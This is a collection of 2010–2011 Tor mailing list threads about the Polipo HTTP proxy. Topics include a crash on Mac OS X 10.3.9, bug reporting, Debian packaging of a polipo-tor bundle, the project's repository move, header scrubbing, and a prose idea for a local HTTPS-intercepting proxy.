[Geoff Down] [Polipo-users] Polipo crash (Vidalia Bundle) on OSX10.3.9
---BeginMessage--- Hello, the Polipo in https://www.torproject.org/dist/vidalia-bundles/vidalia-bundle-0.2.2.22-alpha-0.2.10-ppc.dmg crashes on startup as follows: dyld: /Applications/Vidalia.app.new/Contents/MacOS/polipo Undefined symbols: /Applications/Vidalia.app.new/Contents/MacOS/polipo undefined reference to ___stderrp expected to be defined in /usr/lib/libSystem.B.dylib /Applications/Vidalia.app.new/Contents/MacOS/polipo undefined reference to ___stdoutp expected to be defined in /usr/lib/libSystem.B.dylib Trace/BPT trap (This is a similar error message to that with which the Vidalia in that bundle crashes, even when Polipo is already running (an older version) and so Vidalia doesn't need to start it...) Regards, Geoff Down PS I haven't joined the list, so please cc me in any reply. *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/ ---End Message---
Re: Polipo bug reporting
On Mon, 31 Jan 2011 12:20:10 + Geoff Down geoffd...@fastmail.net wrote: Thank you Juliusz, I appreciate your efforts. Clearly Tor needs to ship with a working Polipo, so if this is a real fault would the bundle developers please revert to the version which was in the Vidalia 0.2.9 bundle, which is still working. The difference is that the PPC bundle with vidalia 0.2.9 was built on a 10.3.9 ppc mac. However, the 10.3.9 machine died a smelly, melty death during a build a few months ago. The current bundles are built on a 10.5 ppc mac with backwards compatibility for 10.3.9 (at least according to xcode/gcc). Clearly Apple's backwards compatibility options don't work. -- Andrew pgp 0x74ED336B *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: Polipo bug reporting
* Andrew Lewman and...@torproject.org [2011:01:31 08:56 -0500]: On Mon, 31 Jan 2011 12:20:10 + Geoff Down geoffd...@fastmail.net wrote: Thank you Juliusz, I appreciate your efforts. Clearly Tor needs to ship with a working Polipo, so if this is a real fault would the bundle developers please revert to the version which was in the Vidalia 0.2.9 bundle, which is still working. The difference is that the PPC bundle with vidalia 0.2.9 was built on a 10.3.9 ppc mac. However, the 10.3.9 machine died a smelly, melty death during a build a few months ago. The current bundles are built on a 10.5 ppc mac with backwards compatibility for 10.3.9 (at least according to xcode/gcc). Clearly Apple's backwards compatibility options don't work. They're built with backwards compatibility for 10.4. 10.3 is not supported at this point, unless someone sends me a patch. pgp7posSna6m0.pgp Description: PGP signature
Re: Polipo bug reporting
On Mon, 31 Jan 2011 08:56 -0500, Andrew Lewman and...@torproject.org wrote: On Mon, 31 Jan 2011 12:20:10 + Geoff Down geoffd...@fastmail.net wrote: Thank you Juliusz, I appreciate your efforts. Clearly Tor needs to ship with a working Polipo, so if this is a real fault would the bundle developers please revert to the version which was in the Vidalia 0.2.9 bundle, which is still working. The difference is that the PPC bundle with vidalia 0.2.9 was built on a 10.3.9 ppc mac. However, the 10.3.9 machine died a smelly, melty death during a build a few months ago. Is nobody freecycling one? http://www.freecycle.org/group/US/ GD -- http://www.fastmail.fm - IMAP accessible web-mail *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: Polipo bug reporting
On 1/31/2011 7:58 PM, Geoff Down wrote: The difference is that the PPC bundle with vidalia 0.2.9 was built on a 10.3.9 ppc mac. However, the 10.3.9 machine died a smelly, melty death during a build a few months ago. Is nobody freecycling one? http://www.freecycle.org/group/US/ GD I may be wrong about this, but I believe it's more of a software issue than a hardware one. The last version of Xcode produced for 10.3 is known to produce some wonky, apparently random errors in some applications when they are run on 10.4 and 10.5. I imagine that 10.4 and above are much more prevalent on current live machines (although I'd love to see some hard data either way on that one), so given one dedicated PPC build machine I imagine the emphasis should be placed on producing stable applications for 10.4 and 10.5 (10.6 being Intel-only). Xcode for 10.5 is known to produce applications that play fairly nice with 10.4, but again, things sometimes get wonky with 10.3 (and then again, sometimes not). That's not to say, of course, that if you happened to find and old mac and some 10.3 disks laying around, that a donation wouldn't be appreciated =) ~Justin Aplin *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: Polipo bug reporting
On Sun, 30 Jan 2011 22:59:49 + Geoff Down geoffd...@fastmail.net wrote: how do I report a bug with the Polipo in https://www.torproject.org/dist/vidalia-bundles/vidalia-bundle-0.2.2.22-alpha-0.2.10-ppc.dmg ? And how do I tell which version is in there also please? If that bundle contains a CHANGES file for Polipo, the last entry in it is for the included version of Polipo. ( I saw http://archives.seul.org/or/talk/Jan-2011/msg00161.html but it doesn't specify where the new bugtracker is). We do not know of any new bug tracker for Polipo. If you have a bug report for Polipo itself, report it to the polipo-users mailing list (see https://lists.sourceforge.net/lists/listinfo/polipo-users). Robert Ransom signature.asc Description: PGP signature
Re: Polipo bug reporting
On Sun, 30 Jan 2011 16:20 -0800, Robert Ransom rransom.8...@gmail.com wrote: On Sun, 30 Jan 2011 22:59:49 + Geoff Down geoffd...@fastmail.net wrote: how do I report a bug with the Polipo in https://www.torproject.org/dist/vidalia-bundles/vidalia-bundle-0.2.2.22-alpha-0.2.10-ppc.dmg ? And how do I tell which version is in there also please? If that bundle contains a CHANGES file for Polipo, the last entry in it is for the included version of Polipo. ( I saw http://archives.seul.org/or/talk/Jan-2011/msg00161.html but it doesn't specify where the new bugtracker is). We do not know of any new bug tracker for Polipo. If you have a bug report for Polipo itself, report it to the polipo-users mailing list (see https://lists.sourceforge.net/lists/listinfo/polipo-users). Robert Ransom Thank you. There is a Changes.txt file in the .dmg, but it doesn't mention the Polipo version number, it's mainly concerned with Vidalia changes. I can't see any other file with 'Changes' or 'Version' in the name in the .app folder, other than in the Quicktime section. GD -- http://www.fastmail.fm - Or how I learned to stop worrying and love email again *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: Polipo bug reporting
( I saw http://archives.seul.org/or/talk/Jan-2011/msg00161.html but it doesn't specify where the new bugtracker is). We do not know of any new bug tracker for Polipo. If you have a bug report for Polipo itself, report it to the polipo-users mailing list (see https://lists.sourceforge.net/lists/listinfo/polipo-users). Please note that Polipo is very short on manpower -- there's only me working on it in my copious free time, and it's my nth project, for some large value of n. As Robert mentioned, you're welcome to report your bug on the Polipo mailing list, but please don't expect a timely fix. --Juliusz *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: Polipo bug Re: Tor 0.2.2.21-alpha is out (security patches)
On Fri, 21 Jan 2011 08:32 +0100, Erinn Clark er...@torproject.org wrote: * Geoff Down geoffd...@fastmail.net [2011:01:20 12:56 +]: The Polipo in https://www.torproject.org/dist/vidalia-bundles/vidalia-bundle-0.2.2.21-alpha-0.2.10-ppc-1.dmg is broken: dyld: /Applications/Vidalia.app.new/Contents/MacOS/polipo Undefined symbols: /Applications/Vidalia.app.new/Contents/MacOS/polipo undefined reference to ___stderrp expected to be defined in /usr/lib/libSystem.B.dylib /Applications/Vidalia.app.new/Contents/MacOS/polipo undefined reference to ___stdoutp expected to be defined in /usr/lib/libSystem.B.dylib Trace/BPT trap Hi Geoff, Which version of OS X are you using? Hi Erinn, 10.3.9 GD -- http://www.fastmail.fm - Choose from over 50 domains or use your own *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Polipo bug Re: Tor 0.2.2.21-alpha is out (security patches)
On Tue, 18 Jan 2011 22:11 -0500, Roger Dingledine a...@mit.edu wrote: Tor 0.2.2.21-alpha includes all the patches from Tor 0.2.1.29, which continues our recent code security audit work. The main fix resolves a remote heap overflow vulnerability that can allow remote code execution (CVE-2011-0427). Other fixes address a variety of assert and crash bugs, most of which we think are hard to exploit remotely. All Tor users should upgrade. The Polipo in https://www.torproject.org/dist/vidalia-bundles/vidalia-bundle-0.2.2.21-alpha-0.2.10-ppc-1.dmg is broken: dyld: /Applications/Vidalia.app.new/Contents/MacOS/polipo Undefined symbols: /Applications/Vidalia.app.new/Contents/MacOS/polipo undefined reference to ___stderrp expected to be defined in /usr/lib/libSystem.B.dylib /Applications/Vidalia.app.new/Contents/MacOS/polipo undefined reference to ___stdoutp expected to be defined in /usr/lib/libSystem.B.dylib Trace/BPT trap (I renamed the app folder - the old version is working fine with the new Tor binary). GD -- http://www.fastmail.fm - Email service worth paying for. Try it for free *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: Polipo bug Re: Tor 0.2.2.21-alpha is out (security patches)
* Geoff Down geoffd...@fastmail.net [2011:01:20 12:56 +]: The Polipo in https://www.torproject.org/dist/vidalia-bundles/vidalia-bundle-0.2.2.21-alpha-0.2.10-ppc-1.dmg is broken: dyld: /Applications/Vidalia.app.new/Contents/MacOS/polipo Undefined symbols: /Applications/Vidalia.app.new/Contents/MacOS/polipo undefined reference to ___stderrp expected to be defined in /usr/lib/libSystem.B.dylib /Applications/Vidalia.app.new/Contents/MacOS/polipo undefined reference to ___stdoutp expected to be defined in /usr/lib/libSystem.B.dylib Trace/BPT trap Hi Geoff, Which version of OS X are you using? pgpkt9CBu6wTb.pgp Description: PGP signature
Re: Polipo starts on bootup
Am 19.01.2011 03:27, schrieb andr...@fastmail.fm: I'm using Ubuntu 10.04 and have the Tor browser bundle installed. After Ubuntu boots up and I try to start Tor I find that Tor won't start. I found that Polipo is running so I did a Pidof polipo and then a sudo kill (for the polipo process number). Is there any reason I should have Polipo on my machine at all and, secondly, is there any risk in Polipo starting at bootup? AFAIK: tor project patched the firefox included in TBB so it doesnt need polipo. so, if you use the browser bundle, you dont need it, but i am not aware of any dangers if it exists - it just dont get used. Should I just delete Polipo off my computer? if you dont use it otherwise than for tor (and then its only needed if you also installed tor, and not use the bundle) you should be ok with deleting it. *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: Polipo starts on bootup
Hi Andre, having polipo running should not prevent tor from running. What messages did tor emit when it failed to start? polipo is useful as a http proxy (which tor is not). typically, you would set your system-wide http-proxy environment variable to point to polipo, and configure polipo to use the local tor. -Mary --- On Wed, 1/19/11, andr...@fastmail.fm andr...@fastmail.fm wrote: From: andr...@fastmail.fm andr...@fastmail.fm Subject: Polipo starts on bootup To: or-talk@freehaven.net Date: Wednesday, January 19, 2011, 2:27 AM I'm using Ubuntu 10.04 and have the Tor browser bundle installed. After Ubuntu boots up and I try to start Tor I find that Tor won't start. I found that Polipo is running so I did a Pidof polipo and then a sudo kill (for the polipo process number). Is there any reason I should have Polipo on my machine at all and, secondly, is there any risk in Polipo starting at bootup? Should I just delete Polipo off my computer? *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: Polipo starts on bootup
andr...@fastmail.fm wrote: I'm using Ubuntu 10.04 and have the Tor browser bundle installed. After Ubuntu boots up and I try to start Tor I find that Tor won't start. I found that Polipo is running so I did a Pidof polipo and then a sudo kill (for the polipo process number). Is there any reason I should have Polipo on my machine at all and, secondly, is there any risk in Polipo starting at bootup? Should I just delete Polipo off my computer? afaik polipo is some proxy.. just like privoxy it can be used to invoke TOR... i think it is a little bit smaller than privoxy or so.. here is a small howto... http://www.pps.jussieu.fr/~jch/software/polipo/tor.html i just use torify to start processes that should make use of tor... mostly cronjobs.. but that's my setup.. Dirk *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Polipo starts on bootup
I'm using Ubuntu 10.04 and have the Tor browser bundle installed. After Ubuntu boots up and I try to start Tor I find that Tor won't start. I found that Polipo is running so I did a Pidof polipo and then a sudo kill (for the polipo process number). Is there any reason I should have Polipo on my machine at all and, secondly, is there any risk in Polipo starting at bootup? Should I just delete Polipo off my computer? -- http://www.fastmail.fm - A fast, anti-spam email service. *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: polipo-tor deb/ubuntu native package
On Thu, Jan 13, 2011 at 12:03:58AM -0500, and...@torproject.org wrote: On Fri, Jan 07, 2011 at 03:21:22PM -0800, travis+ml-tor-t...@subspacefield.org wrote 15K bytes in 259 lines about: There has been much discussion over a combined tor and polipo package, as well as a vidalia-tor-polipo package for deb-based systems. Well, I just saw the vidalia ubuntu packages lately, and I think I'll make it a recommended package for my polipo-tor package, since vidalia doesn't seem apropos for headless servers, for example (I could be wrong; only installed it recently). The core issue is that packages should not overwrite other packages config files. I don't; I just installed to parallel files such as /etc/polipo-tor. In other words, it installs polipo, tor, and a bunch of other dependencies, and then installs a parallel set of config files, /var/run pid files, and log files so that it doesn't interfere with the installed polipo. It also runs on a different port (8118 instead of polipo's default of 8123). To make it ridiculously easy for people, I created my own repo here: http://www.subspacefield.org/packages/ubuntu/ Just follow the instructions, sudo aptitude install polipo-tor, install torbutton (or whatever), and go. Should take all of one minute to get up and running. We've generally assumed (wrongly) that linux users understand their system and can handle manual configuration of a few packages, such as tor, polipo, and vidalia. The general answer for users who just want a tor client is to use the tor browser bundle. I understand; I'm old school, I used to track all third-party sources via CVS, but it just doesn't scale very well. Nowadays if it's not in a repo, it doesn't exist for most people - it's beyond their level of interest. I understand both points of view. The real answer is to fix firefox so it doesn't need a proxy between it and Tor. We patch firefox to do just this in the osx and linux tor browser bundles. Polipo was a fine kludge until either we started patching firefox or mozilla fixed their many-years-old socks bug. Hmm, I had no idea this was even available for Linux. It looks like a tarball - it's unclear how this will interact with a package manager, which likes to know which packages installed which files, and updates them automatically, etc. The great thing about free software is that you're welcome to do just what you're doing. You don't like the situation, so you solve it. Great. Thanks. ;-) I believe in do-ocracy. So, now I've brought the level of effort down to one minute or less, and the level of thought down to something you can do while drunk and sleep-deprived, since there's no decisions required. So how do I make people aware of the option? -- Effing the ineffable since 1997. | http://www.subspacefield.org/~travis/ My emails do not usually have attachments; it's a digital signature that your mail program doesn't understand. If you are a spammer, please email j...@subspacefield.org to get blacklisted. pgpkoclIw9M9r.pgp Description: PGP signature
Re: polipo-tor deb/ubuntu native package
Hi, travis+ml-tor-t...@subspacefield.org wrote (17 Jan 2011 20:21:56 GMT) : So, now I've brought the level of effort down to one minute or less, and the level of thought down to something you can do while drunk and sleep-deprived, since there's no decisions required. Thank you. This is much appreciated. So how do I make people aware of the option? In my humble opinion your package shall be pushed to Debian and Ubuntu (or at least to deb.torproject.org) before user awareness is the top priority. Rationale: I'm not a fan of recommending users to install .deb from any random online repository (no offense intended); trusting a given APT source almost equals trusting this repository's admins and package maintainers to be root on your system. I don't think pushing this package to Debian and Ubuntu is that hard and I suggest the following process: 0. If not done yet, compare the default polipo configuration you are shipping with the Tor Browser Bundle's and T(A)ILS' ones, just to make sure no privacy/anonymity-related option was missed. 1. Make sure your package is in good enough shape so that it can be included in Debian (= Debian users can use it as well, and Ubuntu will fetch it from there in a few months). I mean checking the Debian Policy compliance, making sure it is Lintian-clean, etc. 2. Fill a Request For Package (RFP) bug in the Debian BTS [0] so that any Tor-friendly Debian developer is aware of your work and can decide to upload your package into Debian. 3. Mention the RFP bug on the Debian bug that tracks the polipo vs. torbutton port mismatch [1], and reciprocally. 4. Wait for the package to be uploaded into Debian. 5. Wait for the package to be fetched from Debian by Ubuntu. Note that one does not need to be an official Debian developer to maintain packages in Debian. Such a formal status is only needed to upload, so you can go on maintaining this package and work hand in hand with a Debian developer that will advise you if needed, check your packages and push it to the Debian archive (... = Ubuntu archive). [0] http://www.debian.org/devel/wnpp/ [1] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=606916 Bye, -- intrigeri intrig...@boum.org | GnuPG key @ https://gaffer.ptitcanardnoir.org/intrigeri/intrigeri.asc | OTR fingerprint @ https://gaffer.ptitcanardnoir.org/intrigeri/otr.asc | Every now and then I get a little bit restless | and I dream of something wild. *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: polipo-tor deb/ubuntu native package
On Mon, Jan 17, 2011 at 10:42:18PM +0100, intrigeri wrote: So how do I make people aware of the option? In my humble opinion your package shall be pushed to Debian and Ubuntu (or at least to deb.torproject.org) before user awareness is the top priority. Rationale: I'm not a fan of recommending users to install .deb from any random online repository (no offense intended); trusting a given APT source almost equals trusting this repository's admins and package maintainers to be root on your system. Makes sense. I'd like to get it in the torproject.org repo, but I'm not sure how. Per Andrew's suggestion, I opened a trac.torproject.org ticket to ask for someone to help me get it in there. I am unsure of whether it should be in the debian repo, since the dependencies aren't even in there yet. However, I could try and see what they think. I don't think pushing this package to Debian and Ubuntu is that hard and I suggest the following process: 0. If not done yet, compare the default polipo configuration you are shipping with the Tor Browser Bundle's and T(A)ILS' ones, just to make sure no privacy/anonymity-related option was missed. Good point, will do. 1. Make sure your package is in good enough shape so that it can be included in Debian (= Debian users can use it as well, and Ubuntu will fetch it from there in a few months). I mean checking the Debian Policy compliance, making sure it is Lintian-clean, etc. I uploaded it to debian-mentors and it checks out fine now (as of version 1.4) 2. Fill a Request For Package (RFP) bug in the Debian BTS [0] so that any Tor-friendly Debian developer is aware of your work and can decide to upload your package into Debian. Is this related, parallel, a superset or a subset of the debian-mentors RFS process? I could go through that, but haven't flagged this package as needing sponsorship yet since the tor packages themselves aren't in the debian repo. -- Effing the ineffable since 1997. | http://www.subspacefield.org/~travis/ My emails do not usually have attachments; it's a digital signature that your mail program doesn't understand. If you are a spammer, please email j...@subspacefield.org to get blacklisted. pgpYc2530rMhE.pgp Description: PGP signature
Re: polipo-tor deb/ubuntu native package
On Mon, 17 Jan 2011 12:21:56 -0800 travis+ml-tor-t...@subspacefield.org wrote: The real answer is to fix firefox so it doesn't need a proxy between it and Tor. We patch firefox to do just this in the osx and linux tor browser bundles. Polipo was a fine kludge until either we started patching firefox or mozilla fixed their many-years-old socks bug. Hmm, I had no idea this was even available for Linux. It looks like a tarball - it's unclear how this will interact with a package manager, which likes to know which packages installed which files, and updates them automatically, etc. Tor Browser Bundle isn't something to install, you extract and run. I've seen a few linux users just double click the tar.gz file and run from inside their archive extractor. -- Andrew pgp 0x74ED336B *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: polipo-tor deb/ubuntu native package
Hi, travis+ml-tor-t...@subspacefield.org wrote (17 Jan 2011 23:55:16 GMT) : I am unsure of whether it should be in the debian repo, since the dependencies aren't even in there yet. What are the missing dependencies? (I have not had a single look at your package yet, sorry.) However, I could try and see what they think. From my (limited) experience, this is not a process that works very well inside the Debian community. Things are changing though, but the process is slow. What works better, as far as I know, is preparing things really well before submission so that your proposal cannot be rejected for obvious minor reasons: the first impression it makes is pretty important. I uploaded it to debian-mentors and it checks out fine now (as of version 1.4) Congrats :) 2. Fill a Request For Package (RFP) bug in the Debian BTS [0] so that any Tor-friendly Debian developer is aware of your work and can decide to upload your package into Debian. Is this related, parallel, a superset or a subset of the debian-mentors RFS process? I don't know the Debian Mentors process at all, sorry. I could go through that, but haven't flagged this package as needing sponsorship yet since the tor packages themselves aren't in the debian repo. You might be confusing Debian and Ubuntu on this matter as Tor has been part of Debian for years: - http://packages.debian.org/changelogs/pool/main/t/tor/current/changelog - http://snapshot.debian.org/package/tor/ Moreover the Tor package will closely follow upstream releases during the Debian Squeeze lifecycle, thanks to the Debian Volatile archive. Bye, -- intrigeri intrig...@boum.org | GnuPG key @ https://gaffer.ptitcanardnoir.org/intrigeri/intrigeri.asc | OTR fingerprint @ https://gaffer.ptitcanardnoir.org/intrigeri/otr.asc | We're dreaming of something else. | Something more clandestine, something happier. *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
[Polipo-users] Polipo moved back to PPS
---BeginMessage--- Dear all, I've just moved the Polipo repository back to PPS. In order to get the upstream Polipo sources, you now need to do git clone git://git.wifi.pps.jussieu.fr/polipo My branch is called ``master''; Chris's old branch is called ``polipo-chrisd'', and his last tree is tagged ``polipo-chrisd-20100330''. Note that master has moved around; unless you fully understand what that implies, I suggest you just clone yourself a new copy. I'll be cherry picking the more reasonable of Chris's changes over the next days, at which point I'll start working on getting 1.0.5 out the door. If you have any useful patches that fell into the cracks, next week should be a good time to rebase them and send them again. Tor folks -- would you be so kind as to remove the Polipo repository From git.torproject.org, remove the Polipo project from Tor's bug tracker, and make any mentions of Polipo in the tor wiki point at the new location? Thanks to all for your patience, Juliusz pgpMgaauGQc5l.pgp Description: PGP signature -- Protect Your Site and Customers from Malware Attacks Learn about various malware tactics and how to avoid them. Understand malware threats, the impact they can have on your business, and how you can protect your company and customers by using code signing. http://p.sf.net/sfu/oracle-sfdevnl___ Polipo-users mailing list polipo-us...@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/polipo-users ---End Message---
Re: [Polipo-users] Polipo moved back to PPS
git clone git://git.wifi.pps.jussieu.fr/polipo Do you have a gitweb? That would be nice. Chris's old branch is called polipo-chrisd Oh, meaning 'chrisd/polipo' @ 20100113 193d95e3906967433081e0b10626a67c075ac131 and his last tree is tagged ``polipo-chrisd-20100330''. Oh, meaning 'polipo' @ 20100330 b92db574c11961f681fa258314bd7470e4449cc0 This latter tree seeming to be seeded from the former when development there stopped. This commit compiles and runs fine on FreeBSD 8.1 i386 :) *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
polipo-tor deb/ubuntu native package
Attached. I'm gonna make this available on a personal repo in the near future (this weekend or next)... the tools are kinda wonky. All architectures - no binaries - has a proper list of dependencies I think, though I should add vidalia and make some of them optional probably. I've advertised this a few times, to virtually no response. The tor-assistants mlist has been confused, with people telling me they weren't sure what their ubuntu strategy was, whether they even wanted debian packages, etc. I haven't, for the life of me, been able to even figure out who to talk to. I've posted emails perhaps 3 times, with virtually no feedback. Nobody's apparently doing anything. I don't blame them, because the debian packaging tools and docs are complicated and annoying. So, I'm just publishing this myself. If you apt-get this from a repo, it'll install every package you need, IIUC. Then install torbutton, one click and you're on tor. -- Good code works on most inputs; correct code works on all inputs. My emails do not have attachments; it's a digital signature that your mail program doesn't understand. | http://www.subspacefield.org/~travis/ If you are a spammer, please email j...@subspacefield.org to get blacklisted. polipo-tor_1.3_all.deb Description: application/debian-package pgpsdPPythEW5.pgp Description: PGP signature
Polipo and privoxy needed?
I just upgraded my Tor setup with the Browser Bundle. It runs fine but I noticed that I have privoxy and polipo still on my system from the old setup. Can I delete them? signature.asc Description: OpenPGP digital signature
Re: Polipo and privoxy needed?
On Thu, Dec 23, 2010 at 09:26:17AM -0500, pe...@aleksandrsolzhenitsyn.net wrote 1.4K bytes in 34 lines about: : I just upgraded my Tor setup with the Browser Bundle. It runs fine but : I noticed that I have privoxy and polipo still on my system from the old : setup. : : Can I delete them? If you are using TBB, then yes, you can remove privoxy/polipo installed on your system. -- Andrew pgp key: 0x74ED336B *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
SOCKS 4a or SOCKS 5 when using Polipo?
Hello, According to the Tor manual (https://trac.torproject.org/projects/tor/wiki/TheOnionRouter/TorFAQ#IkeepseeingthesewarningsaboutSOCKSandDNSandinformationleaks.ShouldIworry) one should use SOCKS 4a. AIUI, Polipo or Privoxy are used as HTTP proxies which then allow the client (Firefox) to speak to Tor as SOCKS 4a (therefore providing hostnames rather than already resolved IP addresses as with SOCKS 4 or 5). I therefore do not understand why in the Tor version of the Polipo configuration file (https://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf) it says: # Uncomment this if you want to use a parent SOCKS proxy: socksParentProxy = localhost:9050 socksProxyType = socks5 I am going to assume that the need to use a HTTP proxy no longer exists and Firefox used as a SOCKS 5 client allows Tor to do DNS resolutions remotely? Could someone please explain or confirm this? Many thanks.
Re: https proxy [was polipo]
On Sat, Aug 21, 2010 at 6:18 PM, grarpamp grarp...@gmail.com wrote: Nothing in the open source field can do so yet afaik. To do it, a shim needs to be coded and placed between the application and Tor. user - browser - [optional tool] - shim - tor:9050 The shim needs to listen on a proxy port (and or two configurable ports (for http and https)) and connect out to the world (or tor) to a proxy port (socks) (and or two other ports (for http and https or whatever port the input protocol used)). It would pass http unmodified. It would break end to end https. If the destination site had an invalid cert, it would present an invalid self-generated one to the client. If the destination site had a valid cert, it would present a self-generated and self-signed one to the client (which had obviously included the shim's root as a trusted cert), simply to signify to the client as to validity. Identity would be available from verbose logging in the shim and via an http[s] port on the shim itself. It could furthermore 'tee' off two output ports from it's bottom and receive two input ports from it's top. These would be a more general hook into 'optional toolchains' located in between the client and server side, decoding and shuffling the data stream in and out to a toolset at that point. It should have no 'censoring', caching or other features.. as that is what the optional toolsets do best. Note that 'browser' could be anything that can speak http[s], not just FF/MSIE. So 'plugins' are a non option. Very interesting idea. I am considering attempting this in an upcoming practicum term at school starting in January 2011. I wonder if you could help me a bit further by providing a list of advantages this shim would/could provide. I can see it could provide some protection against ssl/ssh mitm attacks. It could better protect the browser (or other app) by moving some of the ssl/tls/cert logic out to an open source proxy of sorts. It could better protect users against ssl/tls/cert vulnerabilities in both open source and proprietary apps. But I confess to not being sufficiently capable yet on this issue, so any input by any other readers here would be greatly appreciated. -- Julie
Re: https proxy [was polipo]
I can see it could provide some protection against ssl/ssh mitm attacks. No. Why do you think it could? It could better protect the browser (or other app) by moving some of the ssl/tls/cert logic out to an open source proxy of sorts. Protect? Of what? How? It could better protect users against ssl/tls/cert vulnerabilities in both open source and proprietary apps. Explain, please Best regards, morphium *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: polipo
For the most part, anything involving HTTPS, needs to be taken care of in the browser itself. My personal opinion (and I'm the author of Polipo) is that all content munging should be done in the browser -- munging in the proxy is a broken design. Unfortunately, the browser vendors care more about functionality than privacy. Properly-configured extensions help a lot here. I'd rather see privacy features in the browser core, not slapped-on as extensions. Juliusz *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: https proxy [was polipo]
I can see it could provide some protection against... No. Why do you think it could? - because by default - lots of additional reasons... The shim was just supposed to be a tool so you could hook into an http[s] stream and do whatever with it, or nothing at all. For instance, I've always wanted to cache static images and pages coming in over https via Tor/Inet. Can't do that yet. Throw this shim between your browser and your gateway, tee it off into squid and you could save some significant bandwidth. With https becoming ever more popular and likely to be everywhere soon, I'm sure someone will write the shim sooner or later. (Tahoe LAFS / encrypted $cloud storage for your dig :) *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: polipo
For the most part, anything involving HTTPS, needs to be taken care of in the browser itself. Properly-configured extensions help a lot here. Also, that adds an extra layer of protection onto normal HTTP stuff, too. The more, the merrier... F. Fox On 8/21/10, Robert Ransomrransom.8...@gmail.com wrote: (snip) As I understand it, Polipo can't scrub the headers of an HTTPS request, even if you use it as an HTTPS proxy. (snip) *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: https proxy [was polipo]
https://anonymous-proxy-servers.net/en/anontest As I understand it, Polipo can't scrub the headers of an HTTPS request, Nothing in the open source field can do so yet afaik. To do it, a shim needs to be coded and placed between the application and Tor. user - browser - [optional tool] - shim - tor:9050 The shim needs to listen on a proxy port (and or two configurable ports (for http and https)) and connect out to the world (or tor) to a proxy port (socks) (and or two other ports (for http and https or whatever port the input protocol used)). It would pass http unmodified. It would break end to end https. If the destination site had an invalid cert, it would present an invalid self-generated one to the client. If the destination site had a valid cert, it would present a self-generated and self-signed one to the client (which had obviously included the shim's root as a trusted cert), simply to signify to the client as to validity. Identity would be available from verbose logging in the shim and via an http[s] port on the shim itself. It could furthermore 'tee' off two output ports from it's bottom and receive two input ports from it's top. These would be a more general hook into 'optional toolchains' located in between the client and server side, decoding and shuffling the data stream in and out to a toolset at that point. It should have no 'censoring', caching or other features.. as that is what the optional toolsets do best. Note that 'browser' could be anything that can speak http[s], not just FF/MSIE. So 'plugins' are a non option. And that the 'optional tool' might be squid or polipo or whatever. And lastly, erasing your OS and other info from your headers makes you stand out as an obvious eraser. It's better to use a dead common and up to date os and browser and then mind your sessions properly. *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: polipo
Trystero Lot lo...@callout.me writes: it seems the censoredHeaders not working for me. It works for me. have anyone tried to use this and add useragent? It's user-agent, not useragent. censoredHeaders = user-agent Juliusz *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: polipo
still the same. i uncommented and added user-agent censoredHeaders = set-cookie, cookie, cookie2, from,accept-language, user-agent censorReferer = true my header is not clean and in fact shows my OS :( tested using.. https://anonymous-proxy-servers.net/en/anontest *** To unsubscribe, send an e-mail to majord...@torproject.org with unsubscribe or-talkin the body. http://archives.seul.org/or/talk/
Re: polipo
On Sat, 21 Aug 2010 09:39:08 +0800 Trystero Lot lo...@callout.me wrote: still the same. i uncommented and added user-agent censoredHeaders = set-cookie, cookie, cookie2, from,accept-language, user-agent censorReferer = true my header is not clean and in fact shows my OS :( tested using.. https://anonymous-proxy-servers.net/en/anontest As I understand it, Polipo can't scrub the headers of an HTTPS request, even if you use it as an HTTPS proxy. Robert Ransom signature.asc Description: PGP signature
Re: polipo
